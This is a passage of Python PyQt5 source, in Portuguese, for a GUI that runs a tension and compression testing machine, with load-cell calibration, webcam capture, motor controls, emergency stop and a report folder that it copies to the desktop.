self.qline.show()
self.obs4.setGeometry(QtCore.QRect(180,280,151,21))
self.obs4.setObjectName(_fromUtf8("obs"))
self.obs4.setText(_translate("MainWindow", "Nome da Celula:",None))
self.obs4.show()
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.show()
self.bcal2.clicked.connect(self.Ccalibrar)
def Ccalibrar(self):
self.bcal.hide()
self.ecal.hide()
self.obs3.setText(_translate("MainWindow", "Calibrando Celula de Carga Aguarde ! ",None))
VALUE_SERIAL=celula.calibrar()
B = self.pcal.value()
Fator= (float(VALUE_SERIAL)/float(B))
A = self.qline.text()
self.CALIBRA = open("conf_celulas.txt","r")
self.A = self.CALIBRA.readlines()
self.CALIBRA.close()
self.t= ''
self.C = []
self.posicao = 0
for i, valor in enumerate(self.A):
self.p = 0
self.j =0
while(self.p == 0):
if(self.A[i][self.j] != ';'):
self.t= self.t + self.A[i][self.j]
self.j += 1
else:
self.p =1
self.C.append(self.t.replace("\n",""))
self.t =''
if(self.t.replace("\n","") == A):
self.posicao = i
if(A != self.C[self.posicao]):
CALIBRA = open("conf_celulas.txt","a")
CALIBRA.write(str(A)+";")
CALIBRA.write(str(Fator)+"\n")
CALIBRA.close()
self.bcal2.hide()
self.obs3.setText(_translate("MainWindow", "Celula de Carga calibrada agora você já pode Colocar novamente as Garras/Mordentes\n Celula:"+str(A),None))
self.obs4.hide()
self.obs3.hide()
self.pcal.hide()
self.qline.hide()
self.bcal2.hide()
self.bcal.show()
self.ecal.show()
self.bcal2.hide()
else:
self.bcal2.hide()
self.obs3.setText(_translate("MainWindow", "Não foi Adicionado a Nova Celula, pois a celula com o nome:"+str(A)+"já existe vá em editar para recalibra-la",None))
self.obs4.hide()
self.pcal.hide()
self.qline.hide()
self.bcal2.hide()
self.bcal.show()
self.ecal.show()
self.bcal2.hide()
def updateCelulaInterface(self):
try:
CALIBRA = open("conf_celulas.txt","r")
except:
print("O Arquivo conf_celulas.txt, está corrompido ou foi excluido você não pode iniciar o ensaio sem este arquivo, solução: Adicione uma versao antiga do arquivo, se não tiver crie o arquivo e adicione a seguinte linha: celulatest;100000 \n Após você deve ir na aba celula de carga no software e adicionar novamente suas celulas de cargas pois os cadastros anteriores foram perdidas\n",file=log_file)
sys.exit()
try:
arquivo = open("Fator_Calibracao.txt","r")
fator = arquivo.readline()
except:
print("O Arquivo Fator_Calibracao.txt, está corrompido ou foi excluido você não pode iniciar o ensaio sem este arquivo, solução: vá até a interface ,selecione a aba celula de carga e escolha novamente a celula de carga isso irá criar o arquivo novamente. \n",file=log_file)
sys.exit()
A =CALIBRA.readlines()
CALIBRA.close()
t= ''
C = []
posicao = 0
for i, valor in enumerate(A):
for j, text in enumerate(valor):
if(text == ';'):
posicao = j+1
if(valor[posicao::] == fator):
posicao = posicao-1
self.input2.setText(_translate("MainWindow", "Celula de Carga: "+str(valor[:posicao]) ,None))
self.input2.show()
arquivo.close()
CALIBRA.close()
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(924, 599)
MainWindow.setMinimumSize(924, 599)
MainWindow.setMaximumSize(924, 599)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.Config = QtWidgets.QTabWidget(self.centralwidget)
self.Config.setGeometry(QtCore.QRect(0, 0, 961, 581))
self.Config.setObjectName(_fromUtf8("Config"))
self.Config_2 = QtWidgets.QWidget()
self.Config_2.setObjectName(_fromUtf8("Config_2"))
self.input = QtWidgets.QLineEdit(self.Config_2)
self.input.setGeometry(QtCore.QRect(600, 20, 151, 21))
self.input.setObjectName(_fromUtf8("input"))
self.inputl = QtWidgets.QLabel(self.Config_2)
self.inputl.setGeometry(QtCore.QRect(500, 20, 100, 21))
self.inputl.setObjectName(_fromUtf8("inputl"))
self.inputl.setText(_translate("MainWindow", "Nome do Lote:",None))
self.inputl.show()
self.input2 = QtWidgets.QLabel(self.Config_2)
self.input2.setGeometry(QtCore.QRect(500, 50,210,21))
self.input2.setObjectName(_fromUtf8("inputl"))
#self.input2.setText(_translate("MainWindow", "Celula de Carga:",None))
self.updateCelulaInterface()
#self.input2.show()
self.pushButton = QtWidgets.QPushButton(self.Config_2)
self.pushButton.setGeometry(QtCore.QRect(40, 20, 151, 21))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.button_webcam = QtWidgets.QPushButton(self.Config_2)
self.button_webcam.setGeometry(QtCore.QRect(250, 20, 151, 21))
self.button_webcam.setObjectName(_fromUtf8("button_webcam"))
self.combo_webcam = QtWidgets.QComboBox(self.Config_2)
self.combo_webcam.setGeometry(QtCore.QRect(250, 60, 151, 21))
self.combo_webcam.setObjectName(_fromUtf8("combo_webcam"))
self.combo_webcam.show()
clist = webc.cameralist()
clist = clist[::-1]
self.combo_webcam.addItems(clist)
self.t_ensaio = QtWidgets.QFrame(self.Config_2)
self.t_ensaio.setGeometry(QtCore.QRect(50, 90, 201, 201))
self.t_ensaio.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.t_ensaio.setFrameShadow(QtWidgets.QFrame.Raised)
self.t_ensaio.setObjectName(_fromUtf8("t_ensaio"))
self.label = QtWidgets.QLabel(self.t_ensaio)
self.label.setGeometry(QtCore.QRect(50, 0, 101, 17))
self.label.setObjectName(_fromUtf8("label"))
self.checkBox = QtWidgets.QRadioButton(self.t_ensaio)
self.checkBox.setGeometry(QtCore.QRect(20, 50, 151, 22))
self.checkBox.setObjectName(_fromUtf8("checkBox"))
self.checkBox_2 = QtWidgets.QRadioButton(self.t_ensaio)
self.checkBox_2.setGeometry(QtCore.QRect(20, 90, 161, 22))
self.checkBox_2.setObjectName(_fromUtf8("checkBox_2"))
self.Velocidade = QtWidgets.QDoubleSpinBox(self.t_ensaio)
self.Velocidade.setGeometry(QtCore.QRect(27, 160,81, 29))
self.Velocidade.setObjectName(_fromUtf8("Velocidade"))
self.Velocidade.setRange(8, 175 )
self.Velocidade.setValue(10)
self.label_2 = QtWidgets.QLabel(self.t_ensaio)
self.label_2.setGeometry(QtCore.QRect(40, 130, 141, 17))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_3 = QtWidgets.QLabel(self.t_ensaio)
self.label_3.setGeometry(QtCore.QRect(120, 170, 57, 20))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.frame_2 = QtWidgets.QFrame(self.Config_2)
self.frame_2.setGeometry(QtCore.QRect(270, 90, 361, 201))
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName(_fromUtf8("frame_2"))
self.checkBox_3 = QtWidgets.QCheckBox(self.frame_2)
self.checkBox_3.setGeometry(QtCore.QRect(30, 50, 161, 22))
self.checkBox_3.setObjectName(_fromUtf8("checkBox_3"))
self.label_4 = QtWidgets.QLabel(self.frame_2)
self.label_4.setGeometry(QtCore.QRect(120, 0, 111, 17))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.Velocidade_2 = QtWidgets.QDoubleSpinBox(self.frame_2)
self.Velocidade_2.setGeometry(QtCore.QRect(200, 50, 81, 21))
self.Velocidade_2.setObjectName(_fromUtf8("Velocidade_2"))
self.Velocidade_2.setRange(0,99.00)
self.Velocidade_2.setValue(99.00)
self.label_5 = QtWidgets.QLabel(self.frame_2)
self.label_5.setGeometry(QtCore.QRect(210, 40, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.checkBox_4 = QtWidgets.QCheckBox(self.frame_2)
self.checkBox_4.setGeometry(QtCore.QRect(30, 100, 161, 22))
self.checkBox_4.setObjectName(_fromUtf8("checkBox_4"))
self.Velocidade_3 = QtWidgets.QDoubleSpinBox(self.frame_2)
self.Velocidade_3.setGeometry(QtCore.QRect(200, 100, 81, 21))
self.Velocidade_3.setObjectName(_fromUtf8("Velocidade_3"))
self.Velocidade_3.setRange(0,10000.00)
self.label_6 = QtWidgets.QLabel(self.frame_2)
self.label_6.setGeometry(QtCore.QRect(210, 80, 71, 20))
font = QtGui.QFont()
font.setPointSize(8)
self.label_6.setFont(font)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.checkBox_5 = QtWidgets.QCheckBox(self.frame_2)
self.checkBox_5.setGeometry(QtCore.QRect(30, 150, 161, 22))
self.checkBox_5.setObjectName(_fromUtf8("checkBox_5"))
self.Velocidade_4 = QtWidgets.QDoubleSpinBox(self.frame_2)
self.Velocidade_4.setGeometry(QtCore.QRect(200, 150, 81, 21))
self.Velocidade_4.setObjectName(_fromUtf8("Velocidade_4"))
self.Velocidade_4.setRange(0,5000.00)
self.label_7 = QtWidgets.QLabel(self.frame_2)
self.label_7.setGeometry(QtCore.QRect(190, 130, 111, 20))
font = QtGui.QFont()
font.setPointSize(8)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.label_8 = QtWidgets.QLabel(self.frame_2)
self.label_8.setGeometry(QtCore.QRect(280, 100, 57, 20))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.label_9 = QtWidgets.QLabel(self.frame_2)
self.label_9.setGeometry(QtCore.QRect(280, 160, 57, 20))
self.label_9.setObjectName(_fromUtf8("label_9"))
self.t_ensaio_2 = QtWidgets.QFrame(self.Config_2)
self.t_ensaio_2.setGeometry(QtCore.QRect(660, 90, 201, 201))
self.t_ensaio_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.t_ensaio_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.t_ensaio_2.setObjectName(_fromUtf8("t_ensaio_2"))
self.label_10 = QtWidgets.QLabel(self.t_ensaio_2)
self.label_10.setGeometry(QtCore.QRect(40, 0, 101, 17))
self.label_10.setObjectName(_fromUtf8("label_10"))
self.desl = QtWidgets.QLabel(self.t_ensaio_2)
self.desl.setGeometry(QtCore.QRect(20, 20, 141, 17))
self.desl.setObjectName(_fromUtf8("desl"))
self.deslb = QtWidgets.QDoubleSpinBox(self.t_ensaio_2)
self.deslb.setGeometry(QtCore.QRect(27, 40, 81, 29))
self.deslb.setObjectName(_fromUtf8("Vel_ajuste"))
self.deslb.setRange(8, 175)
self.deslb.setValue(30)
self.deslm = QtWidgets.QLabel(self.t_ensaio_2)
self.deslm.setGeometry(QtCore.QRect(110, 50, 57, 20))
self.deslm.setObjectName(_fromUtf8("label_12"))
self.Vel_ajuste = QtWidgets.QDoubleSpinBox(self.t_ensaio_2)
self.Vel_ajuste.setGeometry(QtCore.QRect(27, 90, 81, 29))
self.Vel_ajuste.setObjectName(_fromUtf8("Vel_ajuste"))
self.Vel_ajuste.setRange(8, 175)
self.Vel_ajuste.setValue(120)
self.label_11 = QtWidgets.QLabel(self.t_ensaio_2)
self.label_11.setGeometry(QtCore.QRect(20, 70, 141, 17))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.label_12 = QtWidgets.QLabel(self.t_ensaio_2)
self.label_12.setGeometry(QtCore.QRect(110, 90, 57, 20))
self.label_12.setObjectName(_fromUtf8("label_12"))
self.pushButton_2 = QtWidgets.QPushButton(self.t_ensaio_2)
self.pushButton_2.setGeometry(QtCore.QRect(110, 140, 51, 31))
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.botaodiretorio = QtWidgets.QPushButton(self.Config_2)
self.botaodiretorio.setGeometry(QtCore.QRect(800, 50, 100, 21))
self.botaodiretorio.setObjectName(_fromUtf8("pushButton_2"))
self.botaobrowser = QtWidgets.QPushButton(self.Config_2)
self.botaobrowser.setGeometry(QtCore.QRect(800, 20, 120, 21))
self.botaobrowser.setObjectName(_fromUtf8("pushButton_2"))
self.pushButton_3 = QtWidgets.QPushButton(self.t_ensaio_2)
self.pushButton_3.setGeometry(QtCore.QRect(40, 140, 41, 31))
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.parar_ajuste = QtWidgets.QPushButton(self.t_ensaio_2)
self.parar_ajuste.setGeometry(QtCore.QRect(60, 175, 80, 21))
self.parar_ajuste.setObjectName(_fromUtf8("parar_ajuste"))
self.raio_tubo = QtWidgets.QFrame(self.Config_2)
self.raio_tubo.setGeometry(QtCore.QRect(210, 320, 521, 191))
self.raio_tubo.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.raio_tubo.setFrameShadow(QtWidgets.QFrame.Raised)
self.raio_tubo.setObjectName(_fromUtf8("raio_tubo"))
self.label_13 = QtWidgets.QLabel(self.raio_tubo)
self.label_13.setGeometry(QtCore.QRect(140, 0, 271, 17))
self.label_13.setObjectName(_fromUtf8("label_13"))
self.checkBox_6 = QtWidgets.QRadioButton(self.raio_tubo)
self.checkBox_6.setGeometry(QtCore.QRect(40, 30, 111, 22))
self.checkBox_6.setObjectName(_fromUtf8("checkBox_6"))
self.checkBox_7 = QtWidgets.QRadioButton(self.raio_tubo)
self.checkBox_7.setGeometry(QtCore.QRect(40, 80, 101, 22))
self.checkBox_7.setObjectName(_fromUtf8("checkBox_7"))
self.checkBox_8 = QtWidgets.QRadioButton(self.raio_tubo)
self.checkBox_8.setGeometry(QtCore.QRect(40, 130, 101, 22))
self.checkBox_8.setObjectName(_fromUtf8("checkBox_8"))
self.a_retangulo = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.a_retangulo.setGeometry(QtCore.QRect(180, 30, 81, 21))
self.a_retangulo.setObjectName(_fromUtf8("a_retangulo"))
self.a_retangulo.setRange(0,1000.00)
self.b_retangulo = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.b_retangulo.setGeometry(QtCore.QRect(260, 30, 81, 21))
self.b_retangulo.setObjectName(_fromUtf8("b_retangulo"))
self.b_retangulo.setRange(0,1000.00)
self.retanguloima = QtWidgets.QLabel(self.raio_tubo)
#,posicaoesquerdadireita,posicaoparabaixoaumentar,largura,altura
self.retanguloima.setGeometry(QtCore.QRect(350, 10, 120, 60))
self.retanguloima.setObjectName(_fromUtf8("retangulo"))
self.pixmap1 = QtGui.QPixmap('Imagens/retangulo1.png')
self.pixmap1= self.pixmap1.scaledToWidth(60)
#self.pixmap1= self.pixmap1.scaledToHeight(150)
self.retanguloima.setPixmap(self.pixmap1)
self.tuboima = QtWidgets.QLabel(self.raio_tubo)
#,posicaoesquerdadireita,posicaoparabaixoaumentar,largura,altura
self.tuboima.setGeometry(QtCore.QRect(350, 37, 120, 100))
self.tuboima.setObjectName(_fromUtf8("tubo"))
self.pixmap2 = QtGui.QPixmap('Imagens/tubo1.png')
self.pixmap2= self.pixmap2.scaledToWidth(80)
#self.pixmap1= self.pixmap1.scaledToHeight(150)
self.tuboima.setPixmap(self.pixmap2)
self.ciliima = QtWidgets.QLabel(self.raio_tubo)
#,posicaoesquerdadireita,posicaoparabaixoaumentar,largura,altura
self.ciliima.setGeometry(QtCore.QRect(400, 100, 120, 100))
self.ciliima.setObjectName(_fromUtf8("tubo"))
self.pixmap3 = QtGui.QPixmap('Imagens/cilindro.png')
self.pixmap3= self.pixmap3.scaledToWidth(70)
#self.pixmap1= self.pixmap1.scaledToHeight(150)
self.ciliima.setPixmap(self.pixmap3)
self.label_15 = QtWidgets.QLabel(self.raio_tubo)
self.label_15.setGeometry(QtCore.QRect(190, 15, 61, 21))
font = QtGui.QFont()
font.setPointSize(8)
self.label_15.setFont(font)
self.label_15.setObjectName(_fromUtf8("label_15"))
self.label_16 = QtWidgets.QLabel(self.raio_tubo)
self.label_16.setGeometry(QtCore.QRect(280, 10, 61, 31))
font = QtGui.QFont()
font.setPointSize(8)
self.label_16.setFont(font)
self.label_16.setObjectName(_fromUtf8("label_16"))
self.Velocidade_8 = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.Velocidade_8.setGeometry(QtCore.QRect(180, 80, 81, 21))
self.Velocidade_8.setObjectName(_fromUtf8("Velocidade_8"))
self.Velocidade_8.setRange(0,1000.00)
self.d_retangulo = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.d_retangulo.setGeometry(QtCore.QRect(260, 80, 81, 21))
self.d_retangulo.setObjectName(_fromUtf8("d_retangulo"))
self.d_retangulo.setRange(0,1000.00)
self.label_17 = QtWidgets.QLabel(self.raio_tubo)
self.label_17.setGeometry(QtCore.QRect(190, 66, 61, 20))
font = QtGui.QFont()
font.setPointSize(8)
self.label_17.setFont(font)
self.label_17.setObjectName(_fromUtf8("label_17"))
self.label_18 = QtWidgets.QLabel(self.raio_tubo)
self.label_18.setGeometry(QtCore.QRect(280, 70, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_18.setFont(font)
self.label_18.setObjectName(_fromUtf8("label_18"))
self.D_cilimdro = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.D_cilimdro.setGeometry(QtCore.QRect(180, 130, 81, 21))
self.D_cilimdro.setObjectName(_fromUtf8("D_cilimdro"))
self.D_cilimdro.setRange(0,1000.00)
self.H_cilindro = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.H_cilindro.setGeometry(QtCore.QRect(260, 130, 81, 21))
self.H_cilindro.setObjectName(_fromUtf8("H_cilindro"))
self.H_cilindro.setRange(0,1000.00)
self.label_19 = QtWidgets.QLabel(self.raio_tubo)
self.label_19.setGeometry(QtCore.QRect(190, 120, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_19.setFont(font)
self.label_19.setObjectName(_fromUtf8("label_19"))
self.label_20 = QtWidgets.QLabel(self.raio_tubo)
self.label_20.setGeometry(QtCore.QRect(280, 120, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_20.setFont(font)
self.label_20.setObjectName(_fromUtf8("label_20"))
self.pushButton_4 = QtWidgets.QPushButton(self.Config_2)
self.pushButton_4.setGeometry(QtCore.QRect(240, 20, 101, 21))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_4.sizePolicy().hasHeightForWidth())
self.pushButton_4.setSizePolicy(sizePolicy)
self.pushButton_4.setObjectName(_fromUtf8("pushButton_4"))
self.emergrafic = QtWidgets.QPushButton(self.Grafic)
self.emergrafic.setGeometry(QtCore.QRect(750, 20, 101, 21))
self.emergrafic.setSizePolicy(sizePolicy)
self.emergrafic.setObjectName(_fromUtf8("pushButton_4"))
self.Config.addTab(self.Config_2, _fromUtf8(""))
self.Deslocamento_grafic = QtWidgets.QDoubleSpinBox(self.Grafic)
self.Deslocamento_grafic.setGeometry(QtCore.QRect(170, 90, 131, 31))
self.Deslocamento_grafic.setObjectName(_fromUtf8("Deslocamento_grafic"))
self.Deslocamento_grafic.setRange(0,900)
self.Forca_grafic = QtWidgets.QDoubleSpinBox(self.Grafic)
self.Forca_grafic.setGeometry(QtCore.QRect(540, 90, 121, 31))
self.Forca_grafic.setObjectName(_fromUtf8("Forca_grafic"))
self.Forca_grafic.setRange(0,10000)
self.label_21 = QtWidgets.QLabel(self.Grafic)
self.label_21.setGeometry(QtCore.QRect(180, 70, 111, 17))
self.label_21.setObjectName(_fromUtf8("label_21"))
self.label_22 = QtWidgets.QLabel(self.Grafic)
self.label_22.setGeometry(QtCore.QRect(570, 70, 111, 17))
self.label_22.setObjectName(_fromUtf8("label_22"))
self.label_23 = QtWidgets.QLabel(self.Grafic)
self.label_23.setGeometry(QtCore.QRect(310, 100, 111, 17))
self.label_23.setObjectName(_fromUtf8("label_23"))
self.label_24 = QtWidgets.QLabel(self.Grafic)
self.label_24.setGeometry(QtCore.QRect(670, 100, 111, 20))
self.label_24.setObjectName(_fromUtf8("label_24"))
self.pushButton_5 = QtWidgets.QPushButton(self.Grafic)
self.pushButton_5.setGeometry(QtCore.QRect(110, 20, 110, 29))
self.pushButton_5.setObjectName(_fromUtf8("pushButton_5"))
self.pushButton_6 = QtWidgets.QPushButton(self.Grafic)
self.pushButton_6.setGeometry(QtCore.QRect(560, 20,131 , 29))
self.pushButton_6.setObjectName(_fromUtf8("pushButton_6"))
self.pushButton_7 = QtWidgets.QPushButton(self.Grafic)
self.pushButton_7.setGeometry(QtCore.QRect(320, 20, 131, 29))
self.pushButton_7.setObjectName(_fromUtf8("pushButton_7"))
self.Config.addTab(self.Grafic, _fromUtf8(""))
MainWindow.setCentralWidget(self.centralwidget)
self.fig_dict = {}
#definiçaõ Celula de Carga
self.Calibra = QtWidgets.QWidget()
self.Calibra.setObjectName(_fromUtf8("Celula de Carga"))
self.obs = QtWidgets.QLabel(self.Calibra)
self.obs.setGeometry(QtCore.QRect(20,50,841,21))
self.obs.setObjectName(_fromUtf8("obs"))
self.bcal = QtWidgets.QPushButton(self.Calibra)
self.bcal.setGeometry(QtCore.QRect(150,110,131,29))
self.bcal.setObjectName(_fromUtf8("bcal"))
self.obs3 = QtWidgets.QLabel(self.Calibra)
self.ecal = QtWidgets.QPushButton(self.Calibra)
self.ecal.setGeometry(QtCore.QRect(530,110,151,29))
self.ecal.setObjectName(_fromUtf8("ecal"))
self.scal = QtWidgets.QPushButton(self.Calibra)
self.scal.setGeometry(QtCore.QRect(330,110,161,29))
self.scal.setObjectName(_fromUtf8("scal"))
self.combo = QtWidgets.QComboBox(self.Calibra)
self.Config.addTab(self.Calibra, _fromUtf8(""))
self.combo2 = QtWidgets.QComboBox(self.Grafic)
self.bcombo = QtWidgets.QPushButton(self.Grafic)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 924, 23))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.Config.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.obs.hide()
self.combo.hide()
self.combo2.hide()
self.scal.hide()
self.bcombo.hide()
def func_browser(self):
file = QtWidgets.QFileDialog()
self.filedir = file.getOpenFileName()
#print (self.filedir)
self.ensaiologin = True
def relatorios(self):
os.system('rm -rf /home/laboratorio/Desktop/Ensaios')
os.system('cp -R /opt/MET-Master/Ensaios/ /home/laboratorio/Desktop/Ensaios/')
os.system('chmod 777 /home/laboratorio/Desktop/Ensaios/ -R')
os.system("nautilus /home/laboratorio/Desktop/Ensaios/")
#os.system("exo-open --launch FileManager Ensaios/")
def webcamcapture_final(self):
global contando
escolhido = self.combo.currentText()
self.combo.clear()
cameras = webc.cameralist()
cameras = cameras[::-1]
self.combo.addItems(cameras)
#print(self.combo.currentText(),cameras[0])
imagesavedir = 'TempImagens/'+self.input.text()+str(contando)+'-final.png'
ind=0
for i in range(len(cameras)):
if str(cameras[i]) == escolhido:
ind = i
webc.main(imagesavedir,cameras[ind])
def webcamcapture(self):
global contando
escolhido = self.combo.currentText()
self.combo.clear()
cameras = webc.cameralist()
cameras = cameras[::-1]
self.combo.addItems(cameras)
#print(self.combo.currentText(),cameras[0])
imagesavedir = 'TempImagens/'+self.input.text()+str(contando)+'-inicial.png'
ind=0
for i in range(len(cameras)):
if str(cameras[i]) == escolhido:
ind = i
webc.main(imagesavedir,cameras[ind])
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MET", None))
self.pushButton.setText(_translate("MainWindow", "Iniciar Ensaio", None))
self.pushButton.setStyleSheet('color: Blue')
self.pushButton.clicked.connect(self.iniciar)
self.button_webcam.setText(_translate("MainWindow", "Imagem capture", None))
self.button_webcam.clicked.connect(self.webcamcapture)
self.bcal.setText(_translate("MainWindow", "Adicionar Nova", None))
self.bcal.clicked.connect(self.add_nova)
self.scal.setText(_translate("MainWindow", "Selecionar Celula", None))
self.scal.clicked.connect(self.selecionar)
self.ecal.setText(_translate("MainWindow", "Editar/Calibrar", None))
self.ecal.clicked.connect(self.Editar)
self.label.setText(_translate("MainWindow", "Tipo de ensaio:", None))
self.checkBox.setText(_translate("MainWindow", "Ensaio de tração", None))
self.checkBox.setChecked(True)
self.checkBox_2.setText(_translate("MainWindow", "Ensaio de compressão", None))
self.label_2.setText(_translate("MainWindow", "Velocidade de ensaio", None))
self.label_3.setText(_translate("MainWindow", "mm/min", None))
self.checkBox_3.setText(_translate("MainWindow", "Parada queda de Força ",None))
self.label_4.setText(_translate("MainWindow", "Parada automatica", None))
self.label_5.setText(_translate("MainWindow", "% de Força", None))
self.checkBox_4.setText(_translate("MainWindow", "Parada de Força maxima", None))
self.label_6.setText(_translate("MainWindow", "Força maxima", None))
self.checkBox_5.setText(_translate("MainWindow", "Parada deslocamento", None))
self.label_7.setText(_translate("MainWindow", "Deslocamento Máximo", None))
self.label_8.setText(_translate("MainWindow", "N", None))
self.label_9.setText(_translate("MainWindow", "mm", None))
self.label_10.setText(_translate("MainWindow", "Ajustes Manuais", None))
self.desl.setText(_translate("MainWindow", "deslocamento", None))
self.label_11.setText(_translate("MainWindow", "Velocidade do ajuste", None))
self.label_12.setText(_translate("MainWindow", "mm/min", None))
self.deslm.setText(_translate("MainWindow", "mm", None))
self.botaodiretorio.setText(_translate("MainWindow", "Relatórios", None))
self.botaodiretorio.clicked.connect(self.relatorios)
self.botaodiretorio.show()
self.botaobrowser.setText(_translate("MainWindow", "Browser Ensaio", None))
self.botaobrowser.clicked.connect(self.func_browser)
self.botaobrowser.show()
self.pushButton_2.setText(_translate("MainWindow", "Descer", None))
self.pushButton_2.clicked.connect(self.Descer)
self.pushButton_3.setText(_translate("MainWindow", "Subir", None))
self.pushButton_3.clicked.connect(self.Subir)
self.parar_ajuste.setText(_translate("MainWindow", "Parar", None))
self.parar_ajuste.clicked.connect(self.Parando2)
self.label_13.setText(_translate("MainWindow", "Àrea de Seção do Corpo de Prova", None))
self.checkBox_6.setText(_translate("MainWindow", "Retangular", None))
self.checkBox_7.setText(_translate("MainWindow", "Tubo", None))
self.checkBox_8.setText(_translate("MainWindow", "Cilíndrico", None))
self.label_15.setText(_translate("MainWindow", "L", None))
self.label_16.setText(_translate("MainWindow", "l", None))
self.label_17.setText(_translate("MainWindow", "L", None))
self.label_18.setText(_translate("MainWindow", "D", None))
self.label_19.setText(_translate("MainWindow", "D", None))
self.label_20.setText(_translate("MainWindow", "H", None))
self.pushButton_4.setText(_translate("MainWindow", "Emergência", None))
self.pushButton_4.setStyleSheet('color: red')
self.pushButton_4.clicked.connect(self.Parando)
self.emergrafic.setText(_translate("MainWindow", "Emergência", None))
self.emergrafic.setStyleSheet('color: red')
self.emergrafic.clicked.connect(self.Parando)
self.Config.setTabText(self.Config.indexOf(self.Config_2), _translate("MainWindow", "Configurações", None))
self.label_21.setText(_translate("MainWindow", "Deslocamento", None))
self.label_22.setText(_translate("MainWindow", "Força", None))
self.label_23.setText(_translate("MainWindow", "mm", None))
self.label_24.setText(_translate("MainWindow", "N", None))
self.pushButton_5.setText(_translate("MainWindow", "Reset Gráfico", None))
self.pushButton_5.clicked.connect(self.resetgrafic)
self.pushButton_6.setText(_translate("MainWindow", "Cancelar Test", None))
self.pushButton_6.clicked.connect(self.cancelartestes)
self.pushButton_7.setText(_translate("MainWindow", "Gerar Relátorio", None))
self.pushButton_7.clicked.connect(self.gerarpdf)
self.Config.setTabText(self.Config.indexOf(self.Grafic), _translate("MainWindow", "Gráfico", None))
self.Config.setTabText(self.Config.indexOf(self.Calibra), _translate("MainWindow", "Celula de Carga", None))
self.pushButton_6.hide()
self.pushButton_7.hide()
#Celula de Carga
self.obs.setText(_translate("MainWindow", "OBS: Retire as Garras/Mordentes da Celula de Carga, Não deixe nada apenas a Celula de Carga, Clique em Iniciar.", None))
self.combo.hide()
self.pushButton_4.setVisible(False)
self.emergrafic.setVisible(False)
self.combo.hide()
#self.label12.hide()
class MyForm(QtWidgets.QMainWindow):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
def closeEvent(self,event):
result = QtWidgets.QMessageBox.question(self,
"Confirmar Fechamento do Programa...",
"Você deseja realmente sair do programa ?",
QtWidgets.QMessageBox.Yes| QtWidgets.QMessageBox.No)
event.ignore()
if result == QtWidgets.QMessageBox.Yes:
flag2 =0
Motor.Parar()
event.accept()
class ServerThread(QtCore.QThread):
UPsig = QtCore.pyqtSignal(list)
Stopsig =QtCore.pyqtSignal(int)
def __init__(self, parent=None):
QtCore.QThread.__init__(self)
def start_server(self):
global flag
global VelocidadeEn
global qforca
global maxforca
global maxdeslocamento
global tempinicioteste
global forcas
global deslocamentos
tempo = time.time()
if(flag == 0):
global flag2
while(flag2 == 1):
QtTest.QTest.qWait(500)
flag =1
Forca = celula.getvalue()
if Forca == None:
Forca = 0
pass
'''self.aviso= QtWidgets.QMessageBox()
self.aviso.setText("Por Favor verifique o HX711, aparentemente o mesmo encontra-se desconnectado !")
self.aviso.addButton(QtWidgets.QMessageBox.Yes)
result1 = self.aviso.exec_()'''
else:
tempodecorrido = (time.time() - tempinicioteste)/60
deslocamento = (float(VelocidadeEn))*float(tempodecorrido)
deslocamentos.append(deslocamento)
forcas.append((float(Forca)*9.8))
forcaanterior = forcas[-1]
maiorvalor = forcas.copy()
maiorvalor.sort()
if( time.time()- tempo > 0.8):
lista = [float(deslocamento),float(Forca),float(maiorvalor[-1])+30,float(deslocamentos[-1])+30,deslocamentos,forcas]
#self.emit(QtCore.SIGNAL("UP"), lista)
self.UPsig.emit(lista)
tempo = time.time()
if( flag2 == 1 and maxdeslocamento != None and float(maxdeslocamento) != 0 and float(deslocamento) >= float(maxdeslocamento)):
flag2 =0
